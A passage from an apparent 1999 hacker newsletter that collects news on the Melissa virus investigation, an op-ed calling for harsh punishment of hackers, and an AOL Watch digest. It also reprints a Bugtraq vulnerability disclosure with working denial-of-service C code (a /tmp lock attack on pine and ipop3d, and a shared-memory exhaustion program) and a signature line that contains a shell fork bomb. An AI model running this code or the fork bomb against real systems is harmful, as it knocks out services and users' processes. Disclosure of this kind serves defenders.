world of virus writing, they are termed scripters, a name Ms. Gordon gave
to them.
Ms. Gordon said virus-writing enthusiasts had evolved from the late 80's.
"It used to be a small group of people with these interests," she said.
"With the advent of the Internet, the community has widened and
accessibility of applications to young people has increased."
That may have particular currency in the case of the Melissa virus. Some
computer security experts have suggested that David L. Smith, the New
Jersey man arrested in the case yesterday, cobbled together his own virus
code with virus templates he found on the Web.
Authorities in New Jersey said they did not believe that Smith is the
virus writer known as VicodinES, whose handle has been linked in Internet
postings with the creation and dissemination of Melissa. What is certain
is that VicodinES, whoever he or she is, has a Web site that advocates the
creation and use of viruses, and that Smith's name was found in several
documents on that Web site dating back at least a year, said Richard
Smith, an independent software developer in Cambridge, Mass., who is an
amateur computer sleuth.
The Web site, which was taken down on Tuesday night by Access Orlando, the
Internet service provider in Orlando, Fla., where the Web server was
situated, served as a bulletin board and downloading site for viruses. It
contained commentary by the author who identified himself as VicodinES.
But some virus writers contend that it is far too simplistic to
characterize all virus writers as malicious. Some are attracted to virus
writing because they want to deconstruct programming code, see how it
works, and poke holes in it as an intellectual endeavor, said a longtime
virus writer known as Attitude Adjuster.
"The idea that all of us out here are malicious teen-agers is quite a
fallacy," said Attitude Adjuster, who was contacted by E-mail and declined
to give his real name. "There are those of us who still exist in the
community who write viruses because it's fun. We don't give our viruses to
the public and nobody gets hurt."
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Hacker News Network [www.hackernews.com]
@HWA
18.3 A shadowy bunch...Philly Inquirer
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.phillynews.com/inquirer/99/Apr/04/front_page/VIRU04.htm
<a href="http://www.phillynews.com/inquirer/99/Apr/04/front_page/VIRU04.htm">Link</a>
In virus arrest, a glimpse of a shadowy bunch
Across the country, young men are found sharing recipes for inflicting mayhem
on computers.
By David Cho
INQUIRER SUBURBAN STAFF
David L. Smith has been arrested and identified by investigators as the
man who unleashed Melissa on the computer world, but finding the virus'
original creators -- members of a society of young hackers cloaked behind
aliases and trails of code -- will be substantially harder. These hackers
are likely to be the source, computer experts say, of future, and perhaps
more dangerous, viruses.
And it is these virus creators -- some as young as 14 -- that the FBI is
now pursuing in investigations spanning the country. One member of the
virus-making community, through his Web site, provided Smith with the
necessary information to create and distribute his virus, authorities
said.
The FBI confirmed that it is still investigating the Melissa virus case.
It is following leads based on information gathered from small Internet
companies in Florida and Tennessee, according to officials at those
companies. Considered unwitting hosts to Web sites that contained recipes
for viruses, the companies are not implicated in creating or spreading the
viruses, authorities said.
Smith, of Aberdeen, N.J., was arrested Thursday night. He was charged with
releasing the virus, which affected the e-mail accounts of at least
100,000 computers in its first five days. America Online technicians, in
cooperation with federal agents, tracked Smith to his Monmouth County
home.
Through his lawyer, Smith, 30, a freelance programmer, denied any
wrongdoing. He was released on $100,000 bail.
"The computer world is a world where people do things, experimental
things, just about every day," said Smith's lawyer, Steven Altman.
"Nothing he did, or intended to do, had a premeditated or wrongful
intent."
Altman described his client as "very upset, scared and nervous. This has
been a horrible ordeal."
Even while refusing to release Smith's computer pseudonym, authorities
said he was not the man behind the pseudonym, VicodinES, who is believed
to have created the virus that Melissa was based on. VicodinES, taken from
the name of a narcotic painkiller, frequently appears in online chat rooms
of the virus-writing community, which calls itself the Virus Exchange.
The problem with catching virus makers is that they work in a clandestine
corner of cyberspace, making them difficult to track in the real world.
They do not trust outsiders to enter into their chat rooms and almost
never reveal their true identities. They keep their chat rooms closed
through several techniques, by hiding behind codes or by unleashing
miniviruses that will shut out unwanted guests.
One man who has the trust of virus-writing circles is B.K. Delong, a Web
consultant based in Boston. From listening to online discussions, Delong
said the Smith arrest had thrown the virus-making community into chaos.
Closed-door meetings were held in online chat rooms that even Delong was
not privy to.
The Virus Exchange, Delong said, basically has two kinds of people --
those who simply enjoy creating and exchanging virus programs as a
demonstration of their skills, and those who steal viruses and release
them into the general population.
Smith's arrest exacerbated that divide, Delong said. Some "spreaders" were
so upset that they threatened to release viruses "that could pretty much
destroy anything on your computer," Delong said. Melissa was relatively
benign, they said, compared to the havoc they can wreak.
The "good" side of the community, though, is trying to redeem its
reputation, Delong said. In an unusual collective statement, members of
the Virus Exchange community said that Smith might have created Melissa,
but he alone could not have been responsible for its rapid spread.
"The media and investigative authorities should not be so quick to condemn
the author of the Melissa bug," the statement said. "Instead they should
be more interested in the person who released the bug which caused the
spread of the virus. VicodinES has initially been blamed for the creation
and spread of the Melissa Virus when in fact, he was not at fault."
Delong added that no one in the community knows for sure whether Smith is
VicodinES. "It's really hard to tell. He may not be known in the
community, but then again he may be very well known in it," he said. "It
all depends on when we figure out his nickname."
For investigators, breaking open the Melissa case had the effect of
bringing at least one hacker -- an unidentified man in his 20s who lives
near Kingsport, Tenn. -- to the attention of the FBI. Two months ago, that
man asked a young local Internet company called Global Connection to host
a Web site for him.
Dennis Halsey, the CEO and vice president of Global Connection, said he
did not think anything of the request at the time. In fact, Halsey did not
require any formal application and never checked to see what the Web site
was. Neither Halsey nor the FBI would release the man's name.
The site turned out to be Codebreakers.org -- one of the main places that
virus creators use to trade code. "We never imagined it to be something
this big, believe me," said Halsey, who described the man as a computer
wizard.
Halsey, who is not implicated in the case, said he knew the man only
because "it's a small town and everybody sort of knows each other." But
Halsey thought it was inconceivable that such a young man could be the
infamous VicodinES or another prominent virus maker. "I'm sure that he is
not the one who wrote the virus," Halsey said. "I mean, this is a
multinational organization, there are members everywhere. How could this
young kid be involved?"
Cary Nachenberg, the chief researcher at the Symantec antivirus research
center in Cupertino, Calif., said virus-writing societies, such as
Codebreakers and VLAD, often drew young men from the most unexpected
places.
"Typically they are all male, teens to mid-20s, computer literate and too
much time on their hands," Nachenberg said. "But the good thing is as they
grow up and find something else to do, they usually stop writing viruses."
About the same time investigators were questioning Halsey in Tennessee, an
FBI team in Orlando, Fla., was confiscating a computer server that
supported SourceofKaos, a Web site authored by VicodinES.
Investigators have said that Smith downloaded a virus from that site and
then added his own touch to create Melissa. The server was operated by
Roger Sibert, who rented it from a small Internet company called Access
Orlando.
Sibert, whose server was dedicated to freedom of speech and anti-Microsoft
issues, does not know who VicodinES is, but said he had exchanged e-mail
messages a couple of times. Sibert added that he was cooperating with
investigators.
Meanwhile, Alan McGinn, the president of Access Orlando, said the server
computer was in the hands of federal agents who believed it had telling
clues to the origins of SourceofKaos and the identity of the enigmatic
VicodinES.
http://www.phillynews.com/inquirer/99/Apr/04/front_page/VIRU04.htm
@HWA
18.4 Very imflammatory article: "Hang Hackers Like Coin Clippers"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
<a href="http://www.nationalpost.com/commentary.asp?f=990407/2456715">Story</a>
The National Post: Montreal, CANADA
Wednesday, April 07, 1999
Hang hackers like coin clippers
Christy McCormick
National Post
If one takes a utilitarian approach to sentencing, then hanging cyber
bandits for launching computer viruses like Melissa, to disable e-mail
will be useful in discouraging others.
To many, executing hackers is like hanging coin clippers in the 18th
century or horse thieves in the 19th. It seems such an over-reaction.
Simply shearing a sliver of silver from a passing shilling doesn't seem
rope-worthy. Nor, from today's perspective, does horse stealing.
But knowledge hardens hearts. Coin clippers drove out good money
from the market and threatened economic collapse in Britain. It had
to be stopped and clippers were hanged briskly until it was.
In the wild west of America, a man without a horse was a man
without a living. In a land with little charity and less welfare, his
livelihood and life were threatened. Culprits received corresponding
severity.
Callow geeks who threaten the world's e-mail and computer systems
can be viewed benignly. High school hackers fiddling with macros on
their own computers then prankishly sending them off into
cyberspace seem like little more than boyish pranks.
But just as the 18th-century coin clipper threatened economic chaos,
and the horse thief caused dangerous economic distress to the
individual, today's hacker, who produces crippling viruses, threatens
the system upon which the democratic world depends.
While detection and/or protection is desired to bring the problem to
heel, savage penalties will do in the meantime. Such severity will at
least separate the dilettante from the fellow who feels that wrecking
the Internet is his calling, and thus will reduce the numbers in the
field.
Admittedly, we shall put some cute kids into jail for a very long time
or have them extradited to parts of the world they damaged, probably
parts that care less about their welfare than we do.
Capital punishment may be a bit much, except in Texas, Florida, and
Louisiana, but whatever severity can be meted out by any jurisdiction
should be seriously considered wherever a hacker is convicted.
Harsh penalties are the traditional response in societies that find
arresting culprits difficult because of an inadequacy in policing. So
until things improve on that front, and cyber crime becomes less of a
menace, hard sentencing is an appropriate quick fix.
Some think this old-fashioned, but old-fashioned society was no more
bloody-minded than we are. The problem was inadequate policing and
protection. It was nearly impossible to catch criminals in any number
proportional to the crime rate in the days of the Bow Street Runner.
That is why they made such examples of the criminals they did catch.
Criminologists agree there is a co-relation between higher catch rates
and leniency in sentencing. But as we wait for improved policing
and/or protection, the natural -- and perfectly wholesome -- response
is to be extraordinarily harsh on those involved in such crimes. We
should also be quite uncaring about their youth and unheeding of all
but the most extraordinary extenuating circumstances.
The Duke of Wellington, commanding armies in the Peninsular War
and later after Waterloo, hanged any soldier caught looting, even if he
only took a chicken or a pig from a local farmer. The Iron Duke had
little retributive feeling about this. There is a story about him
promoting a looting private to corporal after the story the man told
showed he was capable of fighting his way in a tight corner. But, in
general, the duke was not easily charmed. He knew he had to stop
the looting or it would spread and his army could not count on the
good will of the population if he ever suffered a reverse and had to
retreat over the same ground. (American forces attacking Quebec
weren't so careful and grabbed every chicken and pig along the way.
They suffered the horrors of Napoleon's retreat from Moscow, partly
because the locals of Quebec and Maine hid everything from the
retreating looters. It was a horror story that might have be prevented
by a little judicious hanging early on.)
While severity has limitations and should never be substituted for a
quest for good detection and protection, it has a value and should be
employed in the interim. If the West could overcome its fretting over
exculpating features of particular crimes and deal with the problem
with utilitarian insensitivity, it would end up having less harm done to
the cyber citizen tomorrow by being more severe with the cyber
bandit today.
Christy McCormick is a Montreal journalist
@HWA
18.5 Second victim, erh suspect fingered on Melissa virus in Europe...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
<a href="http://www.zdnet.com/zdnn/stories/news/0,4586,2238568,00.html">ZDNet Story</a>
Did Smith author Melissa?
Analyst claims to have found German virus
author -- has alerted the FBI.
By Luke Reiter, ZDTV
April 8, 1999 12:12 AM PT
David L. Smith is set to appear in a New Jersey courtroom at 10:30 a.m. PDT
Thursday in connection with charges stemming from the Melissa virus outbreak.
But now questions are being raised as to whether he is the actual author of
the virus.
Jonathan James, an 18-year-old virus analyst from Sweden who's been helping
the FBI with its Melissa investigation, claims to have identified a second
suspect who he believes was involved in the creation of Melissa.
James won't say much about this other suspect, but he will say that the second
suspect is a male virus writer living somewhere in Europe -- and that he has
already told the FBI exactly where to find that suspect.
James also says that this virus writer speaks German, or some language that's
derived from German. Parts of the Melissa source code include words that appear
to come from a Germanic language.
"I studied his source code and compared it to the Melissa virus source code, and
I can see several similarities that are quite striking, and this thing with the
German or German-related variables," James said.
Does that mean Smith, the 30-year-old programmer from Aberdeen, N.J., did not write
Melissa? James says he doesn't know. According to James, it looks like Smith was
involved in "posting" the virus, but that he may not be the actual author.
Of course, not everyone agrees with James' analysis. Phar Lap Software President
Richard Smith, who's also provided information to the FBI, says this new European
connection may be nothing major. In fact, it might just be plagiarism.
"The most simple explanation here is that the virus writer didn't know how to do
e-mail from Word, and borrowed it from someone else," Smith said. "Just because
some code was written in German doesn't mean that that person was involved in the
actual Melissa virus. It looks more like that code was simply borrowed from them."
Yet more info on Melissa including the legal ramifications can be found on ZDNet's
cybercrime section.
<a href="http://www.zdnet.com/zdtv/cybercrime/">Related Stories</a>
Melissa Trail Leads to 'Ex' Virus Writer
Site administrator says virus writer has gone into retirement, so why is his
name at the center of the Melissa controversy?
By Luke Reiter and Jim Louderback
The administrator whose site houses a page that may belong to the creator of
the Melissa virus told ZDTV that he has nothing to do with the virus, and that
the potential creator "is in retirement."
Roger Sibert, systems administrator for Source of Kaos, a site frequented by
virus enthusiasts, said that site log files showed that VicodinES had not been
active on the site for 30 days. Code written by VicodinES has been linked to
the Melissa virus, which has run wild on the Net since appearing Friday.
"Last I heard, he'd gone into retirement," Sibert told ZDTV Monday night.
The FBI has not contacted Sibert, but the administrator said he would cooperate
with the bureau fully if they do.
"I'm not hiding anything," he said. Sibert said he and VicodinES have
communicated through email and Internet Relay Chat forums. Sibert said he was
impressed with VicodinES's code writing skills.
"He's probably talented enough to do it (the Melissa virus)," he said.
'Going into retirement'
Sibert said he last communicated with VicodinES between eight months a year
ago, when VicodinES had requested that his page be made inactive, as he was
going into retirement.
The Melissa virus contains a unique number-- the Global Unique Identifier or
GUID-- embedded in the header of an attached Microsoft Word file. That number
points to the computer that created the Word document. ZDTV verified that the
GUID number is the same as one contained in a virus called PSD2000.DOC,
located on the site of a virus developer known as VicodinES.
However, the unique computer ID is stored in a Word document only once--
when the document is created. Even if a document is copied to a new computer,
and saved under a new name, the original GUID number does not change.
As any programmer knows, it's a lot easier to create a program by building on the
work done by someone else. And VicodinES admits on his site that he built
PSD2000.DOC based on a virus called Shiver. Shiver is the work of a virus
developer calling himself ALT-F11.
ZDTV tracked down Shiver and checked its GUID, which also matched the one
embedded in Melissa. In addition, another virus created by ALT-F11 (called
Groovie2) also contains the same GUID as Shiver, Melissa and PSD2000. Because
ALT-F11 claims to have written Groovie and Shiver, it's likely that the GUID in
all those viruses maps to his workstation.
A check of the other word macros created by VicodinES found that PSD2000.DOC
was the only file with that GUID. All the others, which VicodinES claims he
created, had a different GUID.
Melissa related to Shiver?
What does all this mean? Whoever wrote Melissa built the virus around a Word file
created on the same machine as Shiver. Was this ALT-F11? Possibly, because
Shiver and Melissa share the same GUID. However, because virus developers
frequently build on the work of others, in the same way that VicodinES built on
Shiver to create PSD2000.DOC, VicodinES could have written Melissa, as well.
Other possibilities exist. Another virus developer could have built Melissa out of
the core of Shiver, or another developer out of another virus created on the same
machine as the core of Shiver.
Finally, someone could have taken the PSD2000.DOC file and enhanced it into
Melissa. Because VicodinES appears to be the first person to have created a Word
2000 macro virus, it could be that the virus creator built Melissa out of Vicodin's
PSD2000.DOC virus. Who is ALT-F11? Our information is spotty, but ALT-F11 is a part
of the self-styled "Alternative Virus Mafia."
<a href="http://www.codebreakers.org/avm/index.html">AVM Website</a>
@HWA
19.0 Various vulnerabilities (mostly Linux);
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
X-Persona: <hwa@press.usmc.net>
Return-Path: <owner-bugtraq@netspace.org>
X-Hate: Where do you want to go to die?
Message-ID: <Pine.LNX.4.05.9903070059130.710-100000@nimue.ids.pl>
Date: Sun, 7 Mar 1999 01:41:25 +0100
Reply-To: Michal Zalewski <lcamtuf@IDS.PL>
Sender: Bugtraq List <BUGTRAQ@netspace.org>
From: Michal Zalewski <lcamtuf@IDS.PL>
Subject: ipop3d (x2) / pine (x2) / Linux kernel (x2) / Midnight Commander
(x2)
To: BUGTRAQ@netspace.org
** Summary of reported vunerabilities **
1. Overflow in CAC.Washington.EDU ipop3d 4.xx
2. Overflow in pine 4.xx (Linux)
3. Lockfile vunerability in pine 4.xx (Linux)
4. Lockfile vunerability in ipop3d 4.xx
5. Linux 2.x IPC vunerability
6. Linux 2.x mmap vunerability
7. Midnight Commander 4.x bugs (x2)
** DETAILS **
1. Overflow in CAC.Washington.EDU ipop3d 4.xx
2. Overflow in pine 4.xx (Linux)
Both programs, at least on Linux platform, have serious security hole.
When data is read from so-called mailbox lock created in /tmp directory
(this happens under certain conditions - please refer exploit code below),
it's stored in _too_small_ buffer. It is possible to overwrite some data,
and registers as well. For testing purposes, simple exploit code presented
below (vunerabilities 3 and 4) could be used - suggested changes:
write(i,"-1",2) -> write(i,"(about 1100 b)",1100)
truncate(i,2) -> truncate(i,1100);
Overflow in pine might be used to gain other lusers' privledges (or,
sometimes, root privledges, depending on his stupidity ;-).
Exploited overflow in ipop3d could be used to gain superuser access (the
only thing done by ipop3d is setuid+setgid, no seteuid/setreuid).
CAC.Washington.EDU ipop3d is shipped by default with Red Hat Linux,
included in IMAP package.
Solution: in both cases, you have to look for something like
kill(i,SIGUSR2) in sources and modify lines just before it ;>
-
3. Lockfile vunerability in pine 4.xx (Linux)
4. Lockfile vunerability in ipop3d 4.xx
The problem is probably well known, but silently ignored by pine vendors.
Unfortunately, it's possible to turn 'mostly harmless feature' in
something nasty - following code allows various DoSes by killing all
processes of luser (could be root?) every time he/she runs pine or
receives mail via POP3 protocol:
-- lock-exploit.c --
// Pine 4.xx, ipop3d 4.xx and other /tmp-lock based mail stuff.
#include <sys/file.h>
#include <sys/stat.h>
#include <unistd.h>
main(int argc,char* argv[]) {
int i,a=0;
char s[100];
struct stat x;
if (!argv[1]) exit(printf("Usage: %s account_name\n",argv[0]));
sprintf(s,"/var/spool/mail/%s",argv[1]);
if (stat(s,&x)) exit(printf("Mailbox (%s) not found.\n",s));
sprintf(s,"/tmp/.%x.%x",(int)x.st_dev,(int)x.st_ino);
fchmod(i=open(s,O_RDWR|O_CREAT,0600),0666);
while (1) {
lseek(i,0,0);
write(i,"-1",2);
ftruncate(i,2);
fsync(i);
if (!a++) if (!flock(i,LOCK_EX)) printf("Got lock on %s.\n",s);
else printf("File %s already locked, wait...\n",s);
sleep(1);
}
}
-- eof --
Works well under Linux. Under BSD, pine seems to have broken mailbox
access negotiation (fortunately ;-). No information about ipop3d.
Mainly, this vunerability demonstrates that world-writable mailbox locks
in /tmp are SICK IDEA (one day, as I recall, one of pine vendors said it's
'harmless', while other solutions allows several DoS attacks... huh).
-
5. Linux 2.x IPC vunerability
Linux IPC implementation seems to be broken. I noticed Alan about one/two
months ago, so I believe it has been fixed in recent 2.2.x Linuxes. In
fact, any luser may consume whole memory available on system using this
simple program:
-- shmkill.c --
extern int errno;int i,d=1;char*x;main(){while(1){x=shmat(shmget(0,10000000/
d,511),0,0);if(errno){d*=10;continue;}for(i=0;i<10000000/d;i++)if(*(x+i));}}
-- eof --
Memory won't be freed even if luser's process will be killed, you have to
use ipcrm, but there could be not enough memory to run anything :-(
Under early 2.2.x, you have to run this program several times, to ensure
pages are detached (in this state, they are onwerless ;-).
The simpliest solution is to restrict for lusers IPC at all. Only a few
programs uses IPC - probably only dosemu and ShoutCast ;>
-
6. Linux 2.x mmap vunerability
Linux 2.0.36 has the similiar problem with copy-on-write pages allocated
with mmap - as these pages are not accounted within per-user limits.
Fortunately, it's less harmfull than (5), because memory will be freed as
soon as process owning it will be killed. Exploit will be NOT posted - see
above.
-
7. Midnight Commander 4.x bugs (x2)
Still not fixed. Temporary files mc are created in insecure way, allowing
typical races. Also, entering directories containing $(...) somewhere
might result in execution of embeeded code. Described days ago, dunno why
it hasn't been patched.
_______________________________________________________________________
Michal Zalewski [lcamtuf@ids.pl] [link / marchew] [dione.ids.pl SYSADM]
[Marchew Industries] ! [http://lcamtuf.na.export.pl] bash$ :(){ :|:&};:
[voice phone: +48 (0) 22 813 25 86] ? [pager (MetroBip): 0 642 222 813]
Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch]
@HWA
20.0 News from AOLWATCH
~~~~~~~~~~~~~~~~~~
Date: Fri, 2 Apr 1999 15:36:20 -0800 (PST)
From: David Cassel <destiny@wco.com>
To: AOL Watch <aolwatch@aolwatch.org>
Subject: AOL Watch: Hackers, Netscape, Death of AOL?
Sender: owner-aolwatch@cloud9.net
Precedence: bulk
X-List-Server: Cloud 9 Consulting, Inc. http://www.cloud9.net
H a c k e r s, N e t s c a p e, D e a t h o f A O L ?
~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~
AOL finalized their acquisition of the browser company Netscape. And many
Netscape employees scrambled for the door. "So many good people have left
by this point anyway," one Netscape staffer writes on their web page.
"People who were with Netscape for 3 or 4 years..."
http://www.tarin.com/aowhat/aodiary.html
Did AOL's unpopularity precede them? "Three other people I know are
leaving within the month, regardless," the page continues. "I don't think
any of them have jobs lined up or are even very interested in looking.
Joe left last week without even waiting the week it would take him to get
the bonus check."
Steve Case had offered each of Netscape's 2300 employees an extra month's
pay to stay until the takeover was complete, according to Wired News.
("AOL's mainstream corporate bent has long made it akin to the antichrist
in the eyes of early Net users," the article notes, "scores of whom came
to work at Netscape in its youth.")
http://www.wired.com/news/news/business/story/16564.html
But though the disgruntled Netscape staffer remained, they created an
on-line diary -- "Doom@Netscape.com" -- chronicling low morale after AOL's
takeover. ( http://www.tarin.com/aowhat/aodiary.html ) Their site also
offered a series of answers to frequently-asked questions, titled "How
does it feel to wake up as an AOL employee?"
"It sucks, duh."
http://www.tarin.com/aowhat/aofaq.html
"I've been proud to work for Netscape, and I will never be proud to work
for AOL."
They linked that response to the "Why AOL Sucks" site.
( http://www.aolsucks.org )
Harsher criticism came yesterday from Netscape's Jamie Zawinski. "This
buyout meant that Netscape's executives had finally given up."
http://www.jwz.org/gruntle/aol.html
In an on-line essay explaining his resignation from a high-profile project
overseeing code for the Mozilla browser, Zawinski too felt compelled to
link to the "Why AOL Sucks" page.
http://www.jwz.org/gruntle/aol.html
http://www.aolsucks.org/censor/
Elsewhere, he articulated his philosophical objections to AOL. "AOL is
about centralization and control of content. Everything that is good
about the Internet, everything that differentiates it from television, is
about empowerment of the individual.
I don't want to be a part of an effort that could result in the
elimination of all that."
http://www.jwz.org/gruntle/nomo.html
Some have resigned themselves to the inevitable. At one recent function
at Netscape, visitors made dark jokes about not spilling drinks on AOL's
carpet. But at least one Netscape employee captured their feelings with
an e-mail tag-line re-writing South Park's familiar refrain.
"Oh my God! They killed Netscape!"
There was just one question remaining when Steve Case made an appearance
at Netscape. "After the deal closes, will you stop sending me disks?"
Steve Case answered evasively. "Well, the thing is, I'm sure you have
neighbors, or friends, or family, who don't yet know about the power of
the Internet, and I think you'll want to share--"
"I think," Netscape's Jim Barksdale cut in, "his answer is no."
http://www.tarin.com/aowhat/caseinterview.html
AOL began their reign by laying-off hundreds of workers -- a whopping 425
Netscape employees. ( "You've Got Pink Slips," read one headline. )
http://fnews.yahoo.com/street/99/03/25/valley_990325.html
But there may be more bad publicity ahead...
The Department of Labor has launched an inquiry into AOL's employment
practices, AOL Watch has learned. Additional information came from an AOL
watchdog web page, which suggests the issue is the lack of wages paid to
on-line staffers. Is AOL employing a force of strictly-controlled
volunteers, using AOL tools to perform the same integral work as paid
employees?
http://www.observers.net/dol.html
The page includes contact information for a Department of Labor officer --
and even a case number. Reached for comment, a Department of Labor
officer added only "If we have an open investigation, I am not allowed to
talk to the reporters." But they acknowledged an awareness of the page's
existence.
But AOL's contact with the federal government doesn't end there. "AOL is
flexing its muscle in the political world," one MSNBC article noted in
November -- citing an "ambitious lobbying campaign" which is just "one
piece of a multi-pronged effort by AOL to increase its influence on the
government's decision-making process."
http://www.zdnet.com/zdnn/stories/news/0,4586,2167455,00.html
AOL appears concerned they'll be replaced by high-speed cable internet
access -- and they've been aggressively lobbying with other companies for
a place in cable offerings. In February, however, C|Net reported that
"Internet service providers were dealt a blow...when the FCC decided to
postpone any decision on whether ISPs had the right to lease access on
cable companies' pipes..."
http://www.news.com/News/Item/0,4,31930,00.html
Meanwhile, AOL's position drew sharp ridicule from the "Frontiers of
Freedom" -- a non-profit organization founded by former U.S. Senator
Malcolm Wallop. "AOL is now calling for the heavy hand of government to
stifle competitors and to regulate access to the internet," the group's
web site complains. "[H]aving made a bad business decision to sell its
own network, AOL has no business inviting government to hamstring
competitors -- who have developed a superior product that's 50 to 100
times faster than AOL's -- by regulating them."
http://www.ffreports.org/
The criticisms are withering. "While they fight Internet censorship (even
going to bat for the free speech rights of a pro-Klan group), they were
less tolerant of a website entitled, www.aolsucks.com," the organization
notes. "That one hit too too close for comfort..." the page continues --
apparently referring to the incident detailed at
http://www.aolsucks.org/webcens/
But more withering comments were submitted by readers.
"Come on AOL, stop wasting money on government lobbyists and put your
money into building a better product."
"If this is the way we want to do things in this country, then I'm
going to start a whale oil lamp company and sue the local electricity
companies for putting me out of business; it makes as much sense."
"The pure unmitigated gall of Steve Case is unbelievable."
http://216.46.238.18/ubb/Forum2/HTML/000001.html
http://216.46.238.18/ubb/Forum1/HTML/000002.html
The site may be bad news for AOL. It offers visitors the ability to
easily contact relevant FCC and Congressional officials on-line. ("We'll
make sure your e-mail is delivered, and your strong beliefs are heard.")
http://ffreports.org/help/index.html
AOL has made light of their own drive for dominance. "We think it would
be good if the IRS would, on your tax form, just have a checkoff box, 'Do
you currently subscribe to AOL,'" Steve Case joked at the National Press
Club in March of 1996, "and if you don't, we'll send you the disk and we
can eliminate a lot of duplication and waste."
But the reality is less jovial. AOL recently filed legal attacks against
AT&T's "WorldNet" service -- for using the phrase "You have mail." AOL's
request to block use of that phrase -- along with the phrases "Buddy List"
and "Instant Message" -- was rejected by a Federal District Court Judge in
early January. "The AOL lawsuit provides a glimpse into a Web future
where lawyers chase ambulances in cyberspace," observed Roger Ebert this
month in his Yahoo! Internet Life column.
AOL's behavior suggests a philosophical danger. "We're pleased that Judge
Hilton has rejected this attempt by AOL to appropriate common Internet
terms for its own exclusive use," AT&T's counsel announced in a
statement. But he added that "we feel this sort of overreaching by one
company raises serious concerns about whether AOL is truly committed to
keeping the Internet an open platform, or whether it intends to leverage
its dominance to make the Net more proprietary."
http://www.att.com/press/item/0,1193,262,00.html
http://www.news.com/News/Item/0,4,30479,00.html
Strangely, the Wall Street Journal had reported last Friday that AOL was
"winning respect across Silicon Valley." But that same day, the Associated
Press reported a high school drop-out broke into AOL's mainframe.
http://www.usatoday.com/life/cyber/tech/cte673.htm
And hours later, an AOL account was fingered as the original distributor
of the Melissa virus. Described as "the most widespread computer virus
ever seen," both Reuters and the Associated Press published the AOL
screen name to which it was eventually linked. The account's member
profile connected the name to a 37-year-old civil engineer in Lynnwood,
Washington -- who says the virus-distributor had stolen access to his
account. "I am a little jarred about the lack of security that AOL has in
place," the engineer told C|Net, "and am now going to close my AOL
account."
http://www.news.com/News/Item/0,4,34435,00.html
http://www.abcnews.go.com/sections/tech/DailyNews/virus990330.html
Ironically, pulling up his account's profile Tuesday displayed an AOL
banner ad advising, "Send your love on-line."
Today the Associated Press reported the virus's originator was " snared
with the help of technicians at America Online, and a computer task force
of federal and state agents."
http://cbs.marketwatch.com/archive/19990402/news/current/melissa.htx
"This is why my aunt can't get through to AOL's tech support," one users
joked on an on-line bulletin board. "They're all busy chasing virus
writers! :) "
http://slashdot.org/comments.pl?sid=99/04/02/1542253&threshold=-1&commentsort=0&mode=thread&cid=2076
It's not the first AOL-related incident. VicodinES, whose work may have
assisted the virus's true creator, brags about creating an earlier virus
disguised as an AOL anti-crash patch, according to Ziff-Davis News. And
AOL "Trojan Horses" are nothing new. MSNBC reported on the picture.exe
password-stealer in January.
http://www.zdnet.com/zdnn/stories/news/0,4586,2235046,00.html
http://www.msnbc.com/news/229572.asp
But security problems ultimately affect AOL's business operations. In
October, the Associated Press reported that a 21-year-old hacked into
AOL's call-center server in Ogden to send a threatening instant message.
("We are sick of your censorship and bad service," it began...)
http://www.desnews.com/cgi-bin/libstory_reg?dn98&9810180329
AOL has actually drawn continuing criticism for their technical
shortcomings. Wired News reported AOL only began testing their components
for year-2000 glitches in January. While that may have been soon enough,
a "Y2K" consultant warned the news outlet that "if it turns out they do
have compliance problems, there's no time left at this point."
http://www.wired.com/news/news/business/story/17911.html
In fact, outages are one of AOL's ongoing expectations. "I would like to
be able to tell you that this sort of thing will never happen again,"
Steve Case commented in 1996 after a 19-hour nationwide outage, "but
frankly, I can't make that commitment."
Ultimately the latest problems may represent business as usual in AOL's
hacker-friendly environment. In 1995 hackers stole Steve Case's e-mail.
In 1996 the Washington Post reported AOL cancelled 370,000 accounts in one
three-month period for "credit card fraud, hacking, etc." (9/16/96.) And
by 1998, hackers had hit at least 34 AOL areas -- including the highlights
for Steve Case's monthly updated. (It's title bar changed to "Hey there
sexy.")
http://www.sfgate.com/cgi-bin/article.cgi?file=/chronicle/archive/1995/09/07/MN16190.DTL
http://www.aolwatch.org/acluhack.htm
http://www.aolwatch.org/hacks.htm
AOL's hacker community may even have its roots in AOL's history. Until
September of 1995, AOL didn't confirm the authenticity of credit card
information submitted for free-trial accounts. The 370,000 cancelled
accounts the next Spring may indicate how entrenched the hacker population
had become.
But when AOL's on-line staff questioned lax policies, AOL Vice President
Kathy Ryan showed indifference. One on-line gathering was told, "we
understand that our aggressive distribution of both software and
certificates can result in 'throwaway' accounts. We have made the
business decision that the benefits in this case outweigh the
disadvantages..."
In those crucial early months, AOL remained silent on the dangers of
"password-thieves." (Password-fishing con artists who turned access to
one AOL account into unauthorized access to several others.) Terms of
Service staffer Chip Douglas ultimately explained AOL's dilemma --
marketing over security -- to another on-line gathering. "Many times we
(AOL) are caught between a rock and a hard place debating over the
importance of our 'community' while still trying to be as open to new
members as possible, and NOT scare them away with needless (?) warnings
about PW scammers, etc."
Later that year, Steve Case made his first public acknowledgment of the
problem -- and Netscape's Security Documentation Manager forwarded the
entire letter to the Cypherpunks mailing list. "Looks like AOL is being
dragged, kicking and screaming, into the world of security," he crowed.
But now Netscape is being dragged into the world of AOL.
The "Doom@Netscape" site answers the question "What are you going to do
now?" by saying "Wait and see what happens. What else can I do?"
That employee got an answer Wednesday. They were laid off.
THE LAST LAUGH
Staffers at Netscape's "NetCenter" may have gotten the last laugh. Last
week their site offered two news headlines -- one announcing "AOL Cuts
Jobs at Netscape."
The second may have voiced related concerns. "Working for an idiot?" it
read. "Do something about it!"
David Cassel
More Information -
http://www.sjmercury.com/columnists/cassidy/docs/mc112598.htm
http://www.aolsucks.org/list/0050.html
http://www.nytimes.com/library/tech/99/01/biztech/articles/31aol.html
http://www.angelfire.com/co/atomikspage/letter.html
~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~++~
Please forward with subscription information. To subscribe to this
